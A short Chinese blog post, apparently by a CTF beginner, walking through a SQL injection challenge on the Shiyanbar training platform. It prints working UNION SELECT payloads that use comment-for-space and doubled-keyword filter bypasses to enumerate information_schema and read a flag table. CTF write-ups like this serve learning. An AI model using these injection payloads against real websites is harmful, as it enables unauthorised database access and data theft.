实验吧web-简单的sql注入

想着ctf是必须要学的了，自己是个菜鸡，还是多学一点。看到了实验吧平台，第一天，就从sql注入开始学起吧。

简单的sql注入，用了sqlmap没有成功（刚知道这个工具第一次尝试就失败了QAQ），看来直接从网上破解吧。

第一个想法就是先试一下初始的1，竟然有反应，没想到。

有一个坑是这个可以过滤空格，因此空格可以使用/**/代替或者输两遍单词,如果单纯输入1‘union select database()'是会报错的，因此输入1' /**/union/**/select/**/database()'

看到了数据库名，接下来看数据库中的表名，使用1' /**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

果然出现了一大堆表，其中有一个flag表，对其进行查询，绕不过去了。。。双写也不行，看见网上一种写法是1' unionunion selectselect column_namcolumn_namee fromfrom information_schema.coluinformation_schema.columnsmns wherewhere table_name='flag（太神奇了我也不知道双写空格还双写英文混乱字母）

查到了字段名，可以查值了，使用1' /**/union/**/select/**/flag/**/from/**/flag/**/where'1'='1

结束。

接上，sqlmap来破解，见sqlmap用法 - 简书中的第一个。